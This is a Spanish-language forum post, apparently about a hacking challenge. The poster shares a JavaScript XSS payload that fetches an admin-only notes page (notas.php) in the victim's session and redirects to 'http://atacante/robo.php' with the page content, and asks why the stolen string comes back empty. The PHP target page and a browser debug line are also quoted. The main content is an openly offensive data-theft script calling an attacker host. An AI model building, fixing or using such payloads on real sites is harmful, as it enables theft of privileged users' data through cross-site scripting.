archivo.js:
Código: Seleccionar todo
var ajax;
var resp;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
ajax = new XMLHttpRequest();
}else if (window.ActiveXObject) { // IE
try {
ajax = new ActiveXObject("Msxml2.XMLHTTP");
}catch (e) {
try {
ajax = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
console.debug(ajax);
ajax.onreadystatechange = recogeInfo;
ajax.open("GET", "./conte/notas.php", true);
ajax.send();
function recogeInfo() {
console.debug(ajax.readyState);
console.debug(ajax.status);
//if(ajax.readyState == 4 && ajax.status == 200){
if(ajax.readyState == 4){
resp = ajax.responseText;
console.debug(resp);
//alert(ajax.responseText);//aqui no esta entrando
}
//console.debug(resp);
}
document.location="http://atacante/robo.php?s="+resp;//no envia info
XrayWrapper[Object XMLHttpRequest{ readyState=0, timeout=0, withCredentials=false}]...mas
luego k la cadena resp k envio por get asia atacante esta vacia osea que no se logra hacer la peticion al server ya que el objeto no fue creado o nose que esta pasando alli mi problema.
el archivo notas.php tienes este contenido:
Código: Seleccionar todo
<?php
defined("inicioCorrecto") or header("Location: ../index.php");
?>
<font size=4px><b>Mis notas</b></font><hr size=1px color=silver>
<?php
if ($_SESSION['acceso'] == 10) {
echo "<div id='misnotas'><textarea style='width:575px; height:100px;'>aqui respuesta del reto</textarea></div>";
}
?>
el xss se explota cuando el admin ingresa a esta ruta [Enlace externo eliminado para invitados] que seria un archivo llamado mensajes.php k esta en la misma ruta que notas.php el k deseo sacar.
Espero me alla dejado entender y pues espero sea el sitio correcto para el post ya que en si es problema de programacion bueno gracias de antemano hasta luego.